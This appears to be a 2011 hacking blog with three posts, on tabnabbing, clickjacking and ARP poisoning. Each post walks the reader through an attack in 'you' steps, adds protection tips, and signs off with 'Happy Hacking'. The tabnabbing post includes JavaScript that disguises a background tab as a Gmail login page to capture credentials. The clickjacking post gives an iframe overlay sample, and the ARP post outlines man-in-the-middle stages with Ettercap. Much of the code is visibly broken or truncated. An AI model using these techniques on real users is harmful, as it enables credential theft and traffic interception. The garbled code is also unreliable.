Monday, April 18, 2011


  • What is Tabnabbing ?

Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular Web sites by impersonating those sites and convincing the user that the site is genuine. The attack's name was coined in early 2010 by Aza Raskin, a security researcher and design expert.

  • How Tabnabbing Works ?

1. A user navigates to your normal looking site.

2. You detect when the page has lost its focus and hasn’t been interacted with for a while.

3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.

4. As the user scans their many open tabs, the favicon and title act as a strong visual cue - memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

You can make this attack even more effective by changing the copy: Instead of having just a login screen, you can mention that the session has timed out and the user needs to re-authenticate. This happens often on bank websites, which makes them even more susceptible to this kind of attack.

  • Source Code:

var TIMER = null;
var HAS_SWITCHED = false;

window.onblur = function(){
TIMER = setTimeout(changeItUp, 5000);

window.onfocus = function(){
if(TIMER) clearTimeout(TIMER);

function setTitle(text){ document.title = text; }

favicon = {
docHead: document.getElementsByTagName("head")[0],
set: function(url){

addLink: function(iconURL) {
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = iconURL;

removeLinkIfExists: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {

get: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
return link.href;

function createShield(){
div = document.createElement("div"); = "fixed"; = 0; = 0; = "white"; = "100%"; = "100%"; = "center"; = "hidden";

img = document.createElement("img"); = "15px";
img.src = "";

var oldTitle = document.title;
var oldFavicon = favicon.get() || "/favicon.ico";

img.onclick = function(){
div.parentNode.removeChild(div); = "auto";


function changeItUp(){
if( HAS_SWITCHED == false ){
setTitle( "Gmail: Email from Google");


  • Protection:

1. Keep your web browser up-to-date. Also make sure that plugins and extensions are up-to-date and from trusted sources.

2. The NoScript extension for Firefox defends both from the JavaScript-based and from the scriptless attack, based on meta refresh, by preventing inactive tabs from changing the location of the page.

3. Pay attention to the address in your browser’s toolbar, especially when it comes to login pages. It’s easy to get into muscle-memory mode and just assume that a tab is unchanged, but for important user accounts, keep an eye on that location bar.

4. Consider using some sort of password management tool. Raskin points to the Firefox Account Manager as one method of using the browser for your identity manager, but plugins and tools like 1Password are good choices too. Rather than typing in user names and passwords individually, using an identity manager that compares the site you are on against the stored data in its database (making sure the addresses and DNS addresses matchup) will prevent you from entering in information into a false site.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • What is Clickjacking ?

Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

Clickjacking involves generating a fake graphical overlay on top of an existing Web page in order to visually change the Web page while preserving its functionality (buttons, forms, etc.). This is done with the intension of misleading users to interact with the hidden Web page while they believe they are interacting with a completely different Web site.

  • Description:

Using only CSS Z-INDEX and HTML IFRAME, an attacker can create a transparent victim web page that contains privileged buttons. Underneath this transparent IFRAME, the attacker puts content, like a game, that entices the user to click. You may think you're playing a game, when you're actually starting a webcam recording.

Sample Script Code:

<div style="z-index:2; position:absolute;top:0; left:0;width: 70%; height:70%">
<iframe src="" id="frame1" style="opacity:0.4;filter:alpha(opacity=40); " width="100%" height="100%" onmouseover=";this.filters.alpha.opacity=50" onmouseout=";this.filters.alpha.opacity=0"/></iframe></div>
<div align="right" style="position:absolute; top:0; left:0; z-index:1; width: 70%;height:70%; background-color: yellow;text-align:left;">
<strong>This is an example of how a simple clickjacking attack is done by a malicious site.</strong><br/></div>


In this example, an attacker carries the clickjacking attack using a technique called IFrame overlays. In this technique, the malicious Web page includes code that generates the fake UI and an IFrame that points to an email application at a different domain. When the two are combined the top-level page covers portions of the IFrame in order expose only the “Yes” button and the user can be easily tricked into deleting all messages in his inbox.


One of the most notorious examples of Clickjacking was an attack against the Adobe Flash plugin settings page. By loading this page into an invisible iframe, an attacker could trick a user into altering the security settings of Flash, giving permission for any Flash animation to utilize the computer's microphone and camera.


ClickJacking is similar to many others scams which attacked Facebook over the years. It attracts users with status like “OMG This Guy Went a Little Too Far with His Revenge on His Ex-Girlfriend”. On clicking the link it asks users to complete a validation test to ensure that the response is not computer. However, by responding users are actually clicking Facebook’s “share” and “like” buttons, while also posting the message to their wall.

  • Protection:

The best defense against ClickJacking attacks is to use Firefox with the NoScript add-on installed.

Default protections that NoScript has provided for a long time, i.e. JavaScript and plugin blocking can prevent most clickjacking attacks. Since version 1.8.2, NoScript provides a new default kind of protection called ClearClick, which defeats clickjacking no matter if you block frames or not .

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • What is ARP ?
The Address Resolution Protocol (ARP) is a computer networking protocol for determining a network host's hardware address (MAC) or link layer when only its Internet Layer (IP) or Network Layer address is known. In fact it’s a IP to MAC mapping.

Broadcast ARP Request:

Jessica, the receptionist, tells Word to print the latest company contact list. This is her first print job today. Her computer (IP address wants to send the print job to the office's HP LaserJet printer (IP address So Jessica's computer broadcasts an ARP Request to the entire local network asking, "Who has the IP address,"

Unicast ARP Reply:

All the devices on the network ignore this ARP Request, except for the HP LaserJet printer. The printer recognizes its own IP in the request and sends an ARP Reply: "Hey, my IP address is Here is my MAC address: 00:90:7F:12:DE:7F"

  • ARP Poisoning:
Address Resolution Protocol (ARP) spoofing, also known as ARP poisoning or ARP Poison Routing (APR), is a technique used to attack an Ethernet wired or wireless network. ARP Spoofing may allow an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop the traffic altogether.

The ability to associate any IP address with any MAC address provides hackers with many attack vectors, including Denial of Service (DoS), Man in the Middle, and MAC Flooding.

  • Man in the Middle Attack (MIMA):
A hacker can exploit ARP Cache Poisoning to intercept network traffic between two devices in your network.

Attack Stage-1:

The hacker wants to see all the traffic between your computer,, and your Internet router, The hacker begins by sending a malicious ARP "reply" (for which there was no previous request) to your router, associating his computer's MAC address with

Attack Stage-2:

Now your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer, associating his MAC Address with

Attack Stage-3:

Now your machine thinks the hacker's computer is your router. Finally, the hacker turns on an operating system feature called IP forwarding. This feature enables the hacker's machine to forward any network traffic it receives from your computer to the router.

  • ARP Poisoning Tool:
Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many feature for network and host analysis.

Download ETTERCAP from here.

  • Protection:
1. Arpwatch is a computer software tool for monitoring Address Resolution Protocol traffic on a computer network. Network administrators monitor ARP activity to detect ARP spoofing.

2. Arping is a computer software tool that is used to discover hosts on a computer network. The arping tool is analogous in function to ping, which probes hosts using the Internet Control Message Protocol at the Internet Layer (OSI Layer 3).

3. Capsa Network Analyzer (Packet Sniffer) is an easy-to-use Ethernet network analyzer (aka. packet sniffer or protocol analyzer) for network monitoring and troubleshooting purposes.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...